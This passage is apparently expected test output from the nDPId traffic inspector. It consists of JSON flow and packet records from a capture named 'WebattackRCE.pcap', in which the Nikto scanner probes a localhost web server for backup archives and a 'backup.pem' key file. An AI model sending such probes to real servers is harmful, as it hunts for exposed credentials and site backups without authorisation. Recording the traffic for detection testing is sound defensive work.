00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276928,"pkt":"AAAAAAAAAAAAAAAACABFAADIwcZAAEAGemd\/AAABfwAAAcLUH5BvVfmVJOeoY4AYAED+vAAAAQEICp1m++idZvvoR0VUIC8xMjcuMC4wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276929,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/L19AAEAGDNh\/AAABfwAAAcLWH5BVghcOcLaACoAYAED+swAAAQEICp1m++mdZvvpR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276932,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/j\/RAAEAGrEJ\/AAABfwAAAcLYH5CKH7ek\/31EG4AYAED+swAAAQEICp1m++ydZvvsR0VUIC8xMjcudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276932,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276933,"pkt":"AAAAAAAAAAAAAAAACABFAADFT2BAAEAG7NB\/AAABfwAAAcLaH5CU9HcQhzdjIYAYAED+uQAAAQEICp1m++2dZvvtR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276934,"pkt":"AAAAAAAAAAAAAAAACABFAADFqdVAAEAGklt\/AAABfwAAAcLcH5A055GDxax\/gIAYAED+uQAAAQEICp1m++6dZvvuR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276936,"pkt":"AAAAAAAAAAAAAAAACABFAADKdTNAAEAGxvh\/AAABfwAAAcLeH5C4Uk1kAkvbMoAYAED+vgAAAQEICp1m+++dZvvvR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276937,"pkt":"AAAAAAAAAAAAAAAACABFAADK9XZAAEAGRrV\/AAABfwAAAcLgH5B7eM0nuPdDlYAYAED+vgAAAQEICp1m+\/GdZvvxR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276938,"pkt":"AAAAAAAAAAAAAAAACABFAADFaYFAAEAG0q9\/AAABfwAAAcLiH5DjU1EuPo0KHoAYAED+uQAAAQEICp1m+\/KdZvvyR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276939,"pkt":"AAAAAAAAAAAAAAAACABFAADFJ3BAAEAGFMF\/AAABfwAAAcLkH5B8NB8+Bh651YAYAED+uQAAAQEICp1m+\/OdZvvzR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276941,"pkt":"AAAAAAAAAAAAAAAACABFAADCOKZAAEAGA45\/AAABfwAAAcLmH5ActAD4h3K22IAYAED+tgAAAQEICp1m+\/WdZvv1R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276943,"pkt":"AAAAAAAAAAAAAAAACABFAADCuRhAAEAGgxt\/AAABfwAAAcLoH5DBbYFGICWC9IAYAED+tgAAAQEICp1m+\/edZvv3R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
